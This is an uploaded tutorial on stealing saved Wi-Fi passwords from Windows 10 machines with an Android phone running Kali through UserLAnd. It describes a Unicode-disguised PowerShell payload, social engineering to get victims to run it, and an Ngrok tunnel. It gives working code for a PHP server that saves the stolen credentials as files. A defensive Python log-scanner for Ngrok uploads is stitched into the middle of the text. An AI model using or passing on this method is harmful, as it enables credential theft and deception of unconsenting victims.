Wi-Fi Password Hacking on Android with UserLAnd

The document outlines a method for using the UserLAnd application to install Kali or Debian on Android without rooting, detailing the limitations of running Wi-Fi hacking tools like Aircrack-ng. It describes a technique to capture saved Wi-Fi passwords from a Windows 10 system using a PowerShell payload and a local PHP server, facilitated by the Ngrok service for external access. The document provides step-by-step instructions for setting up the environment, installing necessary software, and running the PHP server to intercept Wi-Fi credentials.

Uploaded by

kkodiesell
Copyright
© All Rights Reserved

The essence of the method

We will use the free UserLAnd application, which allows you to install Kali or
Debian on the Android OS without the need for rooting (obtaining superuser rights).

However, the most commonly used Wi-Fi hacking tools (such as Aircrack-ng) will not
work with UserLAnd. To run Aircrack-ng, you need to switch the Android wireless
interface to monitor mode, which requires superuser rights that UserLAnd does not
provide. Even if it were possible to intercept a handshake on a network using WPA2
encryption, brute-forcing the password on an Android device would take too long due to
insufficient processor performance.

However, there are other ways to compromise a Wi-Fi password. The method described
in this article requires a little analysis and social engineering. The Kali
distribution installed via the UserLAnd app is used to create a PowerShell-based
payload to copy saved Wi-Fi passwords from a Windows 10 system. The payload file
extension will be masqueraded with Unicode to hide the true file type.
To intercept Wi-Fi passwords sent from the target computer, Kali (on Android)
creates a local PHP server. Bypassing port forwarding and firewalls is done using
the Ngrok service, which allows you to make a local PHP server accessible via the
Internet. The target system will send Wi-Fi passwords to this server.

The above is more than enough, but the hardest part is getting the victim to click
on the malicious payload. We will consider this topic in more detail later.
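
From the defender's side, the path described above (a PowerShell client on Windows posting data to a server exposed through Ngrok) leaves a trace in web-proxy logs. The following Python code is an added example, not part of the original document; the log column layout, the sample lines, and the list of tunnel domain suffixes are constructed assumptions.

```python
import csv
import io

# Assumed tunnel-service suffixes (constructed list; extend for your network).
TUNNEL_SUFFIXES = (".ngrok.io", ".ngrok-free.app", ".ngrok.app")
FIELDS = ["ts", "client", "method", "host", "path", "bytes", "ua"]

# Constructed sample proxy log; the column layout is an assumption.
SAMPLE_LOG = """\
2024-01-09T00:14:02Z,10.0.0.21,GET,www.example.com,/,312,Mozilla/5.0 (Windows NT 10.0; Win64; x64)
2024-01-09T00:15:10Z,10.0.0.37,POST,a1b2c3d4.ngrok.io,/,1480,Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1
2024-01-09T00:16:44Z,10.0.0.37,POST,intranet.example.com,/login,220,Mozilla/5.0 (Windows NT 10.0; Win64; x64)
2024-01-09T00:17:05Z,10.0.0.52,POST,E5F6.NGROK-FREE.APP.,/index.php,900,-
2024-01-09T00:18:30Z,10.0.0.52,GET,docs.ngrok.io.example.com,/,150,curl/8.0
"""


def is_tunnel_host(host):
    """True if host is a subdomain of a listed tunnel service."""
    # Normalise case, drop an optional port and a trailing root dot.
    name = host.strip().lower().split(":")[0].rstrip(".")
    return name.endswith(TUNNEL_SUFFIXES)


def find_uploads(log_text):
    """Return one alert per POST request sent to a tunnel host."""
    alerts = []
    for row in csv.DictReader(io.StringIO(log_text), fieldnames=FIELDS):
        if None in row or None in row.values():
            continue  # malformed line: too many or too few columns
        if row["method"].upper() != "POST" or not is_tunnel_host(row["host"]):
            continue
        # A PowerShell user agent on an upload to a tunnel is the stronger
        # signal; other or missing agents still alert, because the agent
        # string is chosen by the client.
        scripted = "powershell" in row["ua"].lower()
        alerts.append({
            "ts": row["ts"],
            "client": row["client"],
            "host": row["host"].lower().rstrip("."),
            "bytes": int(row["bytes"]) if row["bytes"].isdigit() else 0,
            "severity": "high" if scripted else "medium",
        })
    return alerts


if __name__ == "__main__":
    for alert in find_uploads(SAMPLE_LOG):
        print(alert)
```
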

Getting Started with UserLAnd

Before proceeding, it's a good idea to check out the guide on how to turn your
Android phone into a hackable device without root privileges. That note gives the
basics of UserLAnd and mentions other aspects necessary to successfully implement
the method described in this article. You need to install and configure UserLAnd,
create a new file system, and connect to the OS via SSH using ConnectBot (or
JuiceSSH or the built-in SSH client).

Step 1. Installing the software


It is necessary to perform a system update and install the main programs, as
indicated in the UserLAnd guide I mentioned. Then you can proceed to install the
specific tools that will be needed to implement our method, namely Unzip and PHP.
To install Unzip, use the sudo apt-get install unzip command.
Code:
apt-get install unzip
Reading package lists... Done
Building dependency tree
Reading state information... Done
Suggested packages:
zip
The following NEW packages will be installed:
unzip
0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
Need to get 156 kB of archives.
After this operation, 518 kB of additional disk space will be used.
Get:1 [Link] kali-rolling/main arm64 unzip arm64 6.0-21 [156 kB]
Fetched 156 kB in 6s (24.5 kB/s)
debconf: delaying package configuration, since apt-utils is not installed
E: Setting in Start via TCSAFLUSH for stdin failed! - tcsetattr (13: Permission
denied)
Selecting previously unselected package unzip.
(Reading database ... 13159 files and directories currently installed.)
Preparing to unpack .../unzip_6.0-21_arm64.deb ...
Unpacking unzip (6.0-21) ...
Setting up unzip (6.0-21) ...
Then enter the command apt-mark hold apache* to hold back the Apache web server
packages that would otherwise be downloaded automatically during PHP installation.
This way we do not litter the system with useless binaries and services, and the
installation goes a bit faster.
Code:
apt-mark hold apache*
apache2 set on hold.
apache-users set on hold.
apache2-bin set on hold.
apache2-data set on hold.
apache2-utils set on hold.
apache2-doc set on hold.
apache2-suexec-pristine set on hold.
apache2-suexec-custom set on hold.
apache2-dbg set on hold.
apache2-dev set on hold.
apache2-ssl-dev set on hold.
apachedex set on hold.
apacheds set on hold.
apachetop set on hold.
With the unnecessary packages on hold, we proceed to install PHP by entering
the command apt-get install php.
Code:
apt-get install php
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following additional packages will be installed:
bzip2 file libapparmor1 libargon2-1 libicu63 libmagic-mgc libmagic1 libsodium23
libxml2 mime-support php-common php7.3 php7.3-cli php7.3-common php7.3-fpm php7.3-
json
php7.3-opcache php7.3-readline psmisc xz-utils
Suggested packages:
bzip2-doc php-pear
The following NEW packages will be installed:
bzip2 file libapparmor1 libargon2-1 libicu63 libmagic-mgc libmagic1 libsodium23
libxml2 mime-support php php-common php7.3 php7.3-cli php7.3-common php7.3-fpm
php7.3-json
php7.3-opcache php7.3-readline psmisc xz-utils
0 upgraded, 21 newly installed, 0 to remove and 0 not upgraded.
Need to get 13.6 MB of archives.
After this operation, 58.7 MB of additional disk space will be used.
Do you want to continue? [Y/n]
Finally, restart your Android device. After the restart, we can be sure that all
packages and kernel updates will work on the system with Kali installed via
UserLAnd.

Step 2: Set up a PHP server


After rebooting the device, launch the UserLAnd application and connect to the
system with Kali via SSH.
Now we need the Screen application, which allows us to manage multiple terminal
sessions within one console. In our case, we are talking about the same Android
device. The Screen application is able to "detach" or close the terminal window
without losing the information you were working with during the session.
To launch the application, enter the screen command.
Code:
screen
Then open the shell with superuser rights using the su command.
Code:
su
Create a directory called "phpServer/" using the mkdir command.
Code:
mkdir phpServer/
Change to the created directory using the cd command:
Code:
cd phpServer/
Create a file "[Link]" in the nano editor.
Code:
nano [Link]
Paste the following PHP script into the created file, then save and exit nano by
pressing Ctrl-x and Enter.
Code:
<html>
<title>PHP Server</title>
<body>
<h1>It works!</h1>
<?php
$file = date("dHism") . ".credz";
file_put_contents($file, file_get_contents("php://input"));
?>
</body>
</html>
This PHP script allows you to intercept data and does not require modification.
When a target Windows 10 system sends Wi-Fi credentials, this PHP server will store
the passwords in a file with the date in the name and ".credz" as the extension.

We start the PHP server using the php -S [Link]:80 command. The -S switch starts
the web server built into PHP, and [Link] makes the server available on each
interface. The server listens on port 80, which is used by default by all web
servers and browsers.
Code:
php -S [Link]:80
PHP 7.3.0-2 Development Server started
Listening on [Link]
Document root is /home/user/phpServer
Press Ctrl-C to quit.
To exit (or detach) a session running in the Screen application without stopping
the PHP server, press Ctrl-a followed by d.

Step 3: Check if the PHP server is running

There are two ways to check that the PHP server is still running in the
background. For example, you can use curl to send the server some data that
emulates a Wi-Fi password.
Code:
curl --data "password: qwerty12345" [Link]
Then use the ls command to see what files appeared in the phpServer/ directory.
Code:
ls -l phpServer/
-rw-r--r--. 1 root root 217 Jan 9 00:10 [Link]
-rw-r--r--. 1 root root 0 Jan 9 00:15 [Link]
We look at the contents of files with the .credz extension using the cat command.
Code:
cat phpServer/*.credz
password: qwerty12345
The second way to check the health of the server is the netstat command and the
browser on the Android device.
Code:
netstat -luptn | grep -i php
tcp 0 0 [Link]:2080 [Link]:* LISTEN 14128/php
Please note that PHP listens on port 2080, not on port 80 as specified in one of
the previous commands. For some reason, when ports are opened in operating systems
running through the UserLAnd application, 20 is added at the beginning of the port
number. The reasons for this are not completely clear, but it does not matter for
us, since the Ngrok server will work fine.

Open the browser in Android and enter the address [Link]:2080; the message
“It works!” should appear.
